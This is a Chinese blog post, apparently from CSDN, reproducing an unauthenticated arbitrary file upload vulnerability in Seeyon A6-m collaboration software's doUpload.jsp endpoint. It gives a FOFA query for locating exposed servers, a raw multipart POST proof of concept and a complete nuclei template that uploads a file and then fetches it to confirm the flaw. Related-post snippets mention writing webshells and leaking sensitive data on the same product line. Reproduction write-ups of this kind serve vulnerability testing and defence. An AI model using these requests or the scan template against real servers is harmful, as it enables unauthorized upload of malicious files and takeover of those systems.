致远A6-m协同管理软件任意文件上传漏洞复现

已于 2024-03-04 11:07:21 修改
阅读量493 收藏
点赞数 2
文章标签: web安全 安全
于 2024-03-04 10:33:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/136445119
版权

致远A6-m协同管理软件任意文件上传漏洞复现

1.漏洞介绍

致远A6-m协同管理软件doUpload.jsp接口存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传恶意文件,从而控制服务器。

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
-

4.检索特征

FOFA:icon_hash=“277494963”
在这里插入图片描述

5.POC
POST http://127.0.0.1/yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Length: 219
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvI7BO1Qq69tqF3Fh
Cookie: JSESSIONID=1BDC1511726B24DF9B75FD554960F96A; JSESSIONID=0B4A41EA32B167EC5531DD0F78E4C10D
Origin: http://47.106.219.92:9090/
Accept-Encoding: gzip, deflate, br

------WebKitFormBoundaryvI7BO1Qq69tqF3Fh
Content-Disposition: form-data; name="myfile"; filename="cghn8mdjms.txt"
Content-Type: application/octet-stream

www.cnvd.org.cn
------WebKitFormBoundaryvI7BO1Qq69tqF3Fh--

在这里插入图片描述
https://x.x.x.x/yyoa/portal/upload/1709521517843.txt
在这里插入图片描述

nuclei脚本

id: seeyon-a6-m-doupload-fileupload

info:
  name: 致远A6-m协同管理软件任意文件上传
  author: hugh
  severity: critical
  description: 致远A6-m协同管理软件任意文件上传
  reference:
    - none
  metadata:
    verified: true
    max-request: 2
    fofa-query: 'icon_hash="277494963"'
  tags: seeyon,oa,fileuplaod

variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{rand_base(16)}}"

http:
  - raw:
      - |
        POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 298
        Origin: {{BaseURL}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{boundary}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
        Accept: */*
        Cookie: JSESSIONID=1BDC1511726B24DF9B75FD554960F96A; JSESSIONID=0B4A41EA32B167EC5531DD0F78E4C10D
        Connection: close

        ------WebKitFormBoundary{{boundary}}
        Content-Disposition: form-data; name="myfile"; filename="{{filename}}.txt"
        Content-Type: application/octet-stream

        www.cnvd.org.cn
        ------WebKitFormBoundary{{boundary}}--

      - |
        GET /yyoa/portal/upload/{{jspuploadfilename}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36

    extractors:
      - type: regex
        name: jspuploadfilename
        part: body
        group: 1
        internal: true
        regex:
          - '(\d{13}\.txt)'

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains((body_1), 'window.returnValue') && contains((body_2), 'www.cnvd.org.cn')"

6.修复建议

更新到最新版本

7.参考信息
qq_36334672
关注
【1day】致远OA系统A6版本敏感信息泄漏漏洞学习(4个)
记录并分享学习安全的知识点..
05-04 7000
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、分类 二、致远OA A6 config.jsp 敏感信息泄漏漏洞 (一)概述 (二)漏洞复现 三、致远OA A6 initDataAssess.jsp 用户敏感信息泄露漏洞 (一)概述 (二)漏洞复现 四、致远OA A6 createMysql.jsp 数据库敏感信息泄露漏洞 (一)概述 (二)漏洞复现 五、致远OA A6 DownExcelBeanServlet 用户敏感信息泄露 (一)概述 (.
致远OA漏洞学习——A6版本Session泄漏伪造漏洞
记录并分享学习安全的知识点..
05-08 2837
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞复现 1.获取到所有用户的SessionID ,请求: 2.开始进行伪装,bp遍历替换其中一个Session值: 3.bp开始抓包放包得到如下页面: 4.访问/yyoa/portal/portalIndex.jsp进入首页 一、概述 通过使用存在漏洞的请求时,会回显所有在线用户的Session值,导致出现任意登录的情况,漏洞使用前提是必须系统是有人登录的。 二...
致远OA SQL&任意文件下载漏洞(含批量检测POC)
今天是几号的博客
03-21 3383
通过信息收集,查出web根目录D:/UFseeyon/OA/tomcat/webapps/yyoa,通过 into outfile 写入文件,这里因为 jsp木马存在特殊符号,使用 hex编码 上传允许文件上传的jsp文件。致远OA webmail.do文件读取漏洞,由于/seeyon/webmail.do 页面 filePath 参数过滤不严,导致可以读取系统敏感文件。致远OA A6 test.jsp 存在sql注入漏洞,并可以通过注入写入webshell文件控制服务器。app=“致远互联-OA”
致远OA文件写入
weixin_44508748的博客
11-21 2448
该系统的漏洞点在于致远OA-A8系统的Servlet接口暴露,安全过滤处理措施不足,使得用户在无需认证的情况下实现任意文件上传。 攻击者利用该漏洞,可在未授权的情况下,远程发送精心构造的网站后门文件,从而获取目标服务器权限,在目标服务器上执行任意代码漏洞。 影响范围: 致远A8-V5协同管理软件 V6.1sp1 致远A8+协同管理软件 V7.0、V7.0sp1、V7.0sp2、V7.0sp3 致远A8+协同管理软件 V7.1 上面是CNVD发布的漏洞影响范围,但我在V6.1_SP2版本依然测试成功,不知道为
致远OA文件上传漏洞(含批量检测POC)
最新发布
Innocence_0的博客
07-07 1190
漏洞描述* 漏洞描述文章内容仅供学习参考请勿用于非法用途。
致远(用友)OA或M1 漏洞复现
ccz4854的博客
08-09 5152
致远OA通过发送特殊请求获取session,在通过文件上传接口上传特殊构造的恶意压缩包,并通过解压为webshell控制服务器。
致远OA A6 员工敏感信息泄露
qq_42660246的博客
04-26 8330
致远OA A6 员工敏感信息泄露 1.漏洞描述 seeyon OA A6版本存在敏感信息泄露漏洞,攻击者可构造payload,获取敏感信息。 2.复现过程 fofa:app=“致远A6” payload:/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 浏览器访问https://IP:PORT/yyoa/DownExcelBeanServlet?contenttype=use
PeiQi0#PeiQi-WIKI-Book#致远OA A6 createMysql.jsp 数据库敏感信息泄露1
07-25
致远OA A6 createMysql.jsp 数据库敏感信息泄露漏洞描述致远OA A6 存在数据库敏感信息泄露,攻击者可以通过访问特定的URL获取数据库账户以
致远OA wpsAssistServlet接口存在任意文件上传漏洞
weixin_44304678的博客
11-02 656
致远OA互联新一代智慧型协同运营平台以中台的架构和技术、协同、业务、连接、数据的专 业能力,夯实协同运营中台的落地效果;在协同运营平台全面升级的基础上,V8.0深耕大型企业管理模式、运营机制,进一步强化“协同”在管理中的价值,推动大中型企业、集团企业、国资以及高新技术企业的管理模式升级,帮助企业构筑全程、全域、全端的运营和服务能力,提升人员效率和组织绩效,赋能企业数字化、智能化发展。作者对使用该文章导致的任何直接或间接损失不承担任何责任。该文章仅用于授权测试,任何未经授权的测试均属于非法行为。
致远a8-v5-6.0协同管理软件_高危漏洞利用预警:近期利用“致远OA任意文件写入漏洞”的攻击较多...
weixin_39955829的博客
10-26 2467
概述腾讯御界高级威胁检测系统近期监测到“致远OA系统上的GetShell漏洞”在网上被频繁利用攻击政企客户。对于存在漏洞的OA系统,攻击者无需任何权限,即可向服务器上传webshell。腾讯驻场工程师通过御界高级威胁检测系统告警通知及时向客户通报并采取必要措施,客户业务系统未受攻击影响。详细分析该漏洞最早于6月26号左右,有安全厂商发出漏洞预警。远程攻击者在无需登录的情况下可通过向 UR...
致远 A6-V5协同管理软件 V6.0 白皮书
04-08
致远A6-V5协同管理软件V6.0的白皮书主要涵盖了协同管理软件在互联网+时代下的工作变革、协同管理软件的概念、基于致远V5平台的协同产品家族、致远协同管理软件A6-V5的概述、产品应用体系、以及关于致远公司的一些...
致远 A8-V5协同管理软件 V6.1SP2 用户操作手册(企业版).rar
07-29
致远A8-V5协同管理软件V6.1SP2用户操作手册(企业版) 第一章 关于本手册 介绍本手册的阅读方法 第二章 客户端环境配置 简单介绍客户端配置要求 第三章 快速使用指南 引导您熟悉并快速使用本产品 第四章 首页空间 ...
用友致远-A6协同管理软件启用速查手册.pdf
11-16
用友致远-A6协同管理软件启用速查手册.pdf
【1day】致远系统A6版本任意文件下载漏洞学习
记录并分享学习安全的知识点..
12-05 551
致远A6系统是一种企业级办公自动化软件解决方案,由中国的软件公司致远信息开发。它提供了一系列功能和模块,用于协助企业管理和优化办公流程。致远A6系统存在任意文件下载漏洞,,攻击者可以在未经授权的情况下载系统上的任意文件。
致远互联-OA wpsAssistServlet 任意文件读取漏洞复现
0xSec
12-14 1293
致远互联-OAwpsAssistServlet存在任意文件读取漏洞,攻击者可读取系统密码等敏感信息进一步控制系统。
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 912
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
致远OA敏感信息泄露漏洞合集(含批量检测POC)
今天是几号的博客
03-21 8229
用友致远OA协同管理软件为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、文化建设、规范管理、资源整合、运营管控等难题,是组织管理的最佳实践。产品系列: A3、A6、A8品牌: 用友对象: 微型、小型企业、企业部门级。
致远A6-m协同管理软件V3.0企业版详细操作手册
"致远A6-m协同管理软件企业版操作手册" 《致远A6-m手册》详尽地介绍了这款由北京致远协创软件有限公司研发的协同管理软件,该软件在中国协同软件市场连续五年保持占有率第一。A6-m协同管理软件V3.0是在充分了解客户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值